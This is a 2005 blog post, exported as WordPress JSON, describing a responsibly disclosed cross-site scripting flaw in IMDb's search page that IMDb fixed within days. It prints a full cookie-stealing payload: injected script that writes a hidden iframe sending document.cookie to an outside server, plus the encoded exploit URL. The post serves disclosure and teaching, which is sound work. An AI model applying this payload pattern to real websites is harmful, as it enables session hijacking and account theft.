{"id":68,"date":"2005-10-31T22:43:17","date_gmt":"2005-11-01T05:43:17","guid":{"rendered":"http:\/\/outflux.net\/blog\/archives\/2005\/10\/31\/imdb-xss\/"},"modified":"2005-10-31T22:45:14","modified_gmt":"2005-11-01T05:45:14","slug":"imdb-xss","status":"publish","type":"post","link":"https:\/\/outflux.net\/blog\/archives\/2005\/10\/31\/imdb-xss\/","title":{"rendered":"imdb xss"},"content":{"rendered":"<p>Last week I discovered a cross-site scripting vulnerability in IMDb&#8217;s website.  It was a strong enough vulnerability that I could actively steal login sessions with it.  Part of their Search system would pass the &#8220;to-be-displayed&#8221; location on the URL, and didn&#8217;t quote HTML entities.  I was able to steal my own cookies and log in with my IMDb account from another computer.  Last Wed, I reported it:<\/p>\n<blockquote><p>\n26 Oct 2005 10:29:59 PM<br \/>\nHello!<\/p>\n<p>It seems your service is vulnerable to cross-site scripting (XSS).  Since you<br \/>\nhave login information stored as cookies, it&#8217;s possible for people to trick<br \/>\nothers into exposing their logins.  As an example, this displays your cookies to<br \/>\nyou in your browser:<\/p>\n<p>http:\/\/imdb.com\/List?locations=a&#038;&#038;heading=18;%3Cscript%3Ealert(document.cookie)%3C\/script%3E<\/p>\n<p>Please let me know if you have any questions.  I love using IMDb, and thought<br \/>\nyou might want to make yourselves more secure.<br \/>\n<br \/>\nThanks!\n<\/p><\/blockquote>\n<p>At 9am today, they had fixed it:<\/p>\n<blockquote><p>\n31 Oct 2005 09:01:17 AM<br \/>\nThank you for your feedback about the Internet Movie Database.<\/p>\n<p>The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.<\/p>\n<p>We appreciate that you took the time to share your thoughts with us. It has now been fixed.<\/p>\n<p>Thank you for your support!<\/p>\n<p>&#8212;-<br \/>\nRegards,<br \/>\n[name]<br \/>\nThe IMDb Help Desk\n<\/p><\/blockquote>\n<p>Another success for vulnerability reporting!<\/p>\n<p>As for a concrete example, the &#8220;heading&#8221; argument to their search tool was being displayed.  The harmless example I used above just pops an alert dialog.  To actually pass the cookies off-site where it can be collected, I used an invisible IFRAME, and pulled a content-less document from my server.  To do this, I wanted the following to appear on the IMDb page:<\/p>\n<blockquote><p>\n&lt;iframe src=&#8221;http:\/\/outflux.net\/null.html?<strong>cookie<\/strong>&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&lt;\/iframe&gt;\n<\/p><\/blockquote>\n<p>There are a number of ways to take the browser off-site.  Another are the HTTP methods that get used in a lot of AJAX applications.  I haven&#8217;t dug into using that, even though they&#8217;re way more powerful (since you don&#8217;t need to &#8220;hide&#8221; the results of an IFRAME, etc, if you don&#8217;t listen for the HTTP results, they just never get used &#8212; it&#8217;s only the &#8220;side-effect&#8221; of recording the cookie off-site that&#8217;s wanted).  Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:<\/p>\n<blockquote><p>\ndocument.write(&#8216;&lt;iframe src=&#8221;http:\/\/outflux.net\/null.html?&#8217;+document.cookie+'&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&lt;\/iframe&gt;&#8217;)\n<\/p><\/blockquote>\n<p>And here it is, HTML-encoded, stuffed into the middle of the &#8220;header&#8221; argument to the search function, disguised as a search for filming locations in Vancouver, BC:<\/p>\n<blockquote><p>\n<a href=\"http:\/\/imdb.com\/List?endings=on&#038;&#038;locations=Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&#038;&#038;heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write('%3Ciframe%20src=%22http:\/\/outflux.net\/null.html?'%2Bdocument.cookie%2B'%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C\/iframe%3E')%3C\/script%3E%20Canada\">http:\/\/imdb.com\/List?endings=on&#038;&#038;locations=Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&#038;&#038;heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write(&#8216;%3Ciframe%20src=%22http:\/\/outflux.net\/null.html?&#8217;%2Bdocument.cookie%2B&#8217;%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C\/iframe%3E&#8217;)%3C\/script%3E%20Canada<\/a>\n<\/p><\/blockquote>\n<p>And if you click that, you can see their newly fixed entity-escaping.  Again, kudos to IMDb!  Additionally, it looks like they rearranged their search tool to not even use the &#8220;header&#8221; argument anymore.  Neato.<\/p>\n<p style='text-align:left'>&copy; 2005, <a href=\"https:\/\/outflux.net\/blog\/\">Kees Cook<\/a>. This work is licensed under a <a rel=\"license\" href=\"http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/\">Creative Commons Attribution-ShareAlike 4.0 License<\/a>.<br \/><a rel=\"license\" href=\"http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/\"><img decoding=\"async\" alt=\"CC BY-SA 4.0\" style=\"border-width:0\" src=\"https:\/\/i.creativecommons.org\/l\/by-sa\/4.0\/88x31.png\" \/><\/a> <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Last week I discovered a cross-site scripting vulnerability in IMDb&#8217;s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the &#8220;to-be-displayed&#8221; location on the URL, and didn&#8217;t quote HTML entities. I was able to steal my own cookies and log in [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,12],"tags":[],"_links":{"self":[{"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/posts\/68"}],"collection":[{"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/comments?post=68"}],"version-history":[{"count":0,"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/posts\/68\/revisions"}],"wp:attachment":[{"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/media?parent=68"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/categories?post=68"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/outflux.net\/blog\/wp-json\/wp\/v2\/tags?post=68"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}